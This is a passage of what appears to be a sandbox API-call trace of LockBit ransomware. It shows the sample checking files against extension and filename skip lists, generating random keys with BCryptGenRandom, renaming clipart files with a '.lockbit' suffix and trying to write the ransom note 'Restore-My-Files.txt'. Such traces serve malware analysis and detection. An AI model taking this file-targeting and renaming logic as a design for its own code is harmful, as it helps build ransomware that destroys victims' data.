[0149.982] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0149.982] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0149.982] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0149.982] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0149.982] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0149.982] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0149.982] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0149.982] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0149.982] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0149.982] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0149.982] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0149.982] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0149.982] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0149.982] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0149.982] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0149.982] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0149.982] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0149.982] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0149.982] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0149.982] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0149.982] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0149.983] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0149.983] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0149.983] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0149.983] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0149.983] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0149.983] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0188587.WMF") returned 1 [0149.983] lstrcmpiW (lpString1="ntldr", lpString2="J0188587.WMF") returned 1 [0149.983] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0188587.WMF") returned 1 [0149.983] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0188587.WMF") returned -1 [0149.983] lstrcmpiW (lpString1="autorun.inf", lpString2="J0188587.WMF") returned -1 [0149.983] lstrcmpiW (lpString1="thumbs.db", lpString2="J0188587.WMF") returned 1 [0149.983] lstrcmpiW (lpString1="iconcache.db", lpString2="J0188587.WMF") returned -1 [0149.983] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0149.983] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188587.WMF") returned=".WMF" [0149.983] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0149.983] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0149.983] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0149.983] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0149.983] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0149.983] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0149.984] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0149.984] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0149.984] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0149.984] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0149.984] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0149.984] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0149.984] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0149.984] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0149.984] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0149.984] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0149.984] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0149.984] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0149.984] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0149.984] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0149.984] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0149.984] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0149.984] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0149.984] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0149.984] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0149.984] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0149.985] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0149.985] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0149.985] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188587.WMF.lockbit") returned 72 [0149.985] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188587.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0188587.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0149.986] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0149.986] malloc (_Size=0x40068) returned 0x3d70450 [0149.986] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=15196) returned 1 [0149.986] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.986] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0149.987] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.987] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0149.987] ReadFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0149.992] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188587.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188587.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0149.993] malloc (_Size=0xa6) returned 0x1fa2ed8 [0149.993] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0149.994] free (_Block=0x1fa2ed8) [0149.994] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188587.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0149.994] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0149.994] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0149.994] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65fe5b50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3e9e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0188667.WMF", cAlternateFileName="")) returned 1 [0149.994] lstrcmpiW (lpString1=".", lpString2="J0188667.WMF") returned -1 [0149.994] lstrcmpiW (lpString1="..", lpString2="J0188667.WMF") returned -1 [0149.994] PathFindExtensionW (pszPath="J0188667.WMF") returned=".WMF" [0149.994] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0149.994] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0149.994] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0149.994] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0149.994] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0149.994] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0149.995] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0149.995] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0149.995] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0149.995] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0149.995] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0149.995] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0149.995] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0149.995] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0149.995] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0149.995] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0149.995] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0149.995] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0149.995] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0149.995] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0149.995] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0149.995] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0149.995] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0149.995] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0149.995] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0149.995] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0149.995] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0149.996] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0149.996] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0149.996] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0149.996] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0149.996] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0149.996] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0149.996] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0149.996] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0149.996] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0149.996] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0149.996] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0149.996] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0149.996] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0149.996] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0149.996] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0149.996] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0149.996] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0149.996] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0149.996] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0149.996] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0149.996] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0188667.WMF") returned 1 [0149.997] lstrcmpiW (lpString1="ntldr", lpString2="J0188667.WMF") returned 1 [0149.997] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0188667.WMF") returned 1 [0149.997] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0188667.WMF") returned -1 [0149.997] lstrcmpiW (lpString1="autorun.inf", lpString2="J0188667.WMF") returned -1 [0149.997] lstrcmpiW (lpString1="thumbs.db", lpString2="J0188667.WMF") returned 1 [0149.997] lstrcmpiW (lpString1="iconcache.db", lpString2="J0188667.WMF") returned -1 [0149.997] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0149.997] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188667.WMF") returned=".WMF" [0149.997] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0149.997] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0149.997] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0149.997] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0149.997] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0149.997] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0149.997] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0149.997] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0149.997] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0149.997] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0149.997] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0149.997] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0149.998] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0149.998] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0149.998] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0149.998] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0149.998] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0149.998] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0149.998] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0149.998] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0149.998] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0149.998] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0149.998] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0149.998] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0149.998] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0149.998] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0149.998] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0149.998] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0149.998] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188667.WMF.lockbit") returned 72 [0149.998] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188667.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0188667.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0149.999] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.000] malloc (_Size=0x40068) returned 0x3ef0008 [0150.000] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=16030) returned 1 [0150.000] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.000] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0150.001] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.001] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.001] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0150.001] ReadFile (in: hFile=0x170, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0150.007] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188667.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188667.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.007] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.007] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.008] free (_Block=0x1fa2ed8) [0150.008] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188667.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.008] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.008] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.008] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65fe5b50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x73a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0188669.WMF", cAlternateFileName="")) returned 1 [0150.008] lstrcmpiW (lpString1=".", lpString2="J0188669.WMF") returned -1 [0150.008] lstrcmpiW (lpString1="..", lpString2="J0188669.WMF") returned -1 [0150.008] PathFindExtensionW (pszPath="J0188669.WMF") returned=".WMF" [0150.008] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.008] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.009] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.009] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.009] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.009] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.009] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.009] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.009] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.009] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.009] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.009] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.009] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.009] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.009] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.009] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.009] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.009] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.009] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.009] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.009] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.009] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.009] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.010] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.010] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.010] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.010] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.010] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.010] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.010] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.010] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.010] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.010] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.010] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.010] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.010] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.010] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.010] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.010] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.010] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.010] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.010] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.010] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.011] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.011] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.011] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.011] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.011] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0188669.WMF") returned 1 [0150.011] lstrcmpiW (lpString1="ntldr", lpString2="J0188669.WMF") returned 1 [0150.011] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0188669.WMF") returned 1 [0150.011] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0188669.WMF") returned -1 [0150.011] lstrcmpiW (lpString1="autorun.inf", lpString2="J0188669.WMF") returned -1 [0150.011] lstrcmpiW (lpString1="thumbs.db", lpString2="J0188669.WMF") returned 1 [0150.011] lstrcmpiW (lpString1="iconcache.db", lpString2="J0188669.WMF") returned -1 [0150.011] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.011] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188669.WMF") returned=".WMF" [0150.011] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.011] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.011] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.011] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.011] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.011] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.011] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.011] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.012] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.012] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.012] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.012] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.012] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.012] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.012] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.012] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.012] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.012] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.012] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.012] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.012] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.012] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.012] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.012] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.012] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.012] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.012] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.012] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.012] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188669.WMF.lockbit") returned 72 [0150.013] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188669.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0188669.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0150.019] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.019] malloc (_Size=0x40068) returned 0x3df0008 [0150.019] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=29602) returned 1 [0150.019] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.020] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0150.020] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.020] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0150.020] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 